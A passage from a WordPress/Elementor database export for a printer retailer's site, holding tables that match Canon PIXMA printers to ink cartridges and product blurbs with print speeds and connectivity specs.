width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7007,3314,'_elementor_version','2.5.14'),(7021,3316,'_elementor_version','2.5.14'),(7027,3317,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" 